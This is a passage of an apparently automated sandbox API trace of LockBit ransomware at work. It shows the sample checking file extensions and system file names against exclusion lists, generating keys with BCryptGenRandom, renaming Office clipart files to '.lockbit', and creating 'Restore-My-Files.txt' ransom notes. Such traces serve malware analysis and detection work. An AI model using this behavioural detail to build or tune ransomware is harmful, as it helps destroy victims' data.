lpString2=".WMF") returned -1 [0166.519] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0166.519] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0166.519] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0166.519] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0166.519] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0166.520] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0166.520] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0166.520] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0166.520] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0166.520] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0166.520] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0166.520] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.520] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0166.520] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0166.520] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0166.520] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0166.520] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00559_.WMF") returned 1 [0166.520] lstrcmpiW (lpString1="ntldr", lpString2="PE00559_.WMF") returned -1 [0166.520] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00559_.WMF") returned -1 [0166.520] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00559_.WMF") returned -1 [0166.520] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00559_.WMF") returned -1 [0166.520] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00559_.WMF") returned 1 [0166.520] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00559_.WMF") returned -1 [0166.520] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0166.520] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00559_.WMF") returned=".WMF" [0166.520] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0166.520] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0166.520] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0166.521] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0166.521] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0166.521] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0166.521] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0166.521] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0166.521] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0166.521] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0166.521] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0166.521] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0166.521] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0166.521] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0166.521] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0166.521] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0166.521] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0166.521] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0166.521] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0166.521] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0166.521] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0166.521] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0166.521] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0166.521] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0166.521] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0166.521] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0166.521] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0166.522] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0166.522] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00559_.WMF.lockbit") returned 72 [0166.522] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00559_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00559_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0166.522] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0166.523] malloc (_Size=0x40068) returned 0x3f70048 [0166.523] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=9904) returned 1 [0166.523] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.523] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0166.523] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.523] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0166.524] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0166.528] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00559_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00559_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0166.528] malloc (_Size=0xa6) returned 0x1fa2ed8 [0166.528] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0166.529] free (_Block=0x1fa2ed8) [0166.529] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00559_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0166.529] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0166.529] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0166.529] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17bf3a00, ftCreationTime.dwHighDateTime=0x1bd4b35, ftLastAccessTime.dwLowDateTime=0x6cd8b0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x17bf3a00, ftLastWriteTime.dwHighDateTime=0x1bd4b35, nFileSizeHigh=0x0, nFileSizeLow=0x5670, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00563_.WMF", cAlternateFileName="")) returned 1 [0166.529] lstrcmpiW (lpString1=".", lpString2="PE00563_.WMF") returned -1 [0166.529] lstrcmpiW (lpString1="..", lpString2="PE00563_.WMF") returned -1 [0166.529] PathFindExtensionW (pszPath="PE00563_.WMF") returned=".WMF" [0166.529] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0166.529] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0166.529] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0166.529] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0166.529] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0166.529] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0166.529] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0166.529] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0166.529] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0166.529] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0166.529] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0166.529] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0166.529] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0166.529] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0166.530] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0166.530] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0166.530] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0166.530] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0166.530] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0166.530] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0166.530] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0166.530] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0166.530] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0166.530] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0166.530] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.530] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0166.530] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0166.530] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0166.530] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0166.530] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0166.530] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0166.530] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0166.530] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0166.530] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0166.530] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0166.530] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0166.530] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0166.530] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0166.530] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0166.530] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0166.530] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0166.531] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0166.531] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.531] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0166.531] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0166.531] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0166.531] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0166.531] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00563_.WMF") returned 1 [0166.531] lstrcmpiW (lpString1="ntldr", lpString2="PE00563_.WMF") returned -1 [0166.531] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00563_.WMF") returned -1 [0166.531] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00563_.WMF") returned -1 [0166.531] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00563_.WMF") returned -1 [0166.531] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00563_.WMF") returned 1 [0166.531] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00563_.WMF") returned -1 [0166.531] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0166.531] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00563_.WMF") returned=".WMF" [0166.531] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0166.531] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0166.531] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0166.531] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0166.531] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0166.531] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0166.531] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0166.531] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0166.531] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0166.531] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0166.531] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0166.531] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0166.531] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0166.532] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0166.532] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0166.532] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0166.532] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0166.532] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0166.532] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0166.532] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0166.532] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0166.532] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0166.532] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0166.532] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0166.532] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0166.532] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0166.532] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0166.532] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0166.532] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00563_.WMF.lockbit") returned 72 [0166.532] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00563_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00563_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0166.533] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0166.533] malloc (_Size=0x40068) returned 0x1ff1e60 [0166.533] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=22128) returned 1 [0166.533] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.533] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0166.533] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.534] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0166.534] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0166.538] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00563_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00563_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0166.538] malloc (_Size=0xa6) returned 0x1fa2ed8 [0166.538] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0166.539] free (_Block=0x1fa2ed8) [0166.539] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00563_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0166.539] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0166.539] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0166.539] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6cd8b0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1ae6, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00578_.WMF", cAlternateFileName="")) returned 1 [0166.539] lstrcmpiW (lpString1=".", lpString2="PE00578_.WMF") returned -1 [0166.539] lstrcmpiW (lpString1="..", lpString2="PE00578_.WMF") returned -1 [0166.539] PathFindExtensionW (pszPath="PE00578_.WMF") returned=".WMF" [0166.539] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0166.539] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0166.539] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0166.539] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0166.539] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0166.539] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0166.539] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0166.539] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0166.539] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0166.539] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0166.539] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0166.539] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0166.539] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0166.540] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0166.540] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0166.540] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0166.540] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0166.540] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0166.540] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0166.540] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0166.540] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0166.540] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0166.540] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0166.540] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0166.540] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.540] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0166.540] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0166.540] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0166.540] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0166.540] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0166.540] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0166.540] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0166.540] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0166.540] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0166.540] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0166.540] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0166.540] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0166.540] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0166.540] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0166.540] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0166.541] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0166.541] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0166.541] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.541] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0166.541] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0166.541] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0166.541] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0166.541] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00578_.WMF") returned 1 [0166.541] lstrcmpiW (lpString1="ntldr", lpString2="PE00578_.WMF") returned -1 [0166.541] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00578_.WMF") returned -1 [0166.541] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00578_.WMF") returned -1 [0166.541] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00578_.WMF") returned -1 [0166.541] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00578_.WMF") returned 1 [0166.541] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00578_.WMF") returned -1 [0166.541] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0166.541] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00578_.WMF") returned=".WMF" [0166.541] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0166.541] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0166.541] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0166.541] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0166.541] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0166.541] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0166.541] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0166.541] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0166.541] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0166.541] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0166.541] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0166.542] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0166.542] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0166.542] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0166.542] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0166.542] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0166.542] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0166.542] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0166.542] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0166.542] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0166.542] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0166.542] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0166.542] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0166.542] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0166.542] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0166.542] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0166.542] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0166.542] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0166.542] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00578_.WMF.lockbit") returned 72 [0166.542] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00578_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00578_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0166.543] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0166.543] malloc (_Size=0x40068) returned 0x3e70008 [0166.543] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=6886) returned 1 [0166.543] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.543] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0166.543] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.544] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0166.544] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0166.548] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00578_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00578_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0166.548] malloc (_Size=0xa6) returned 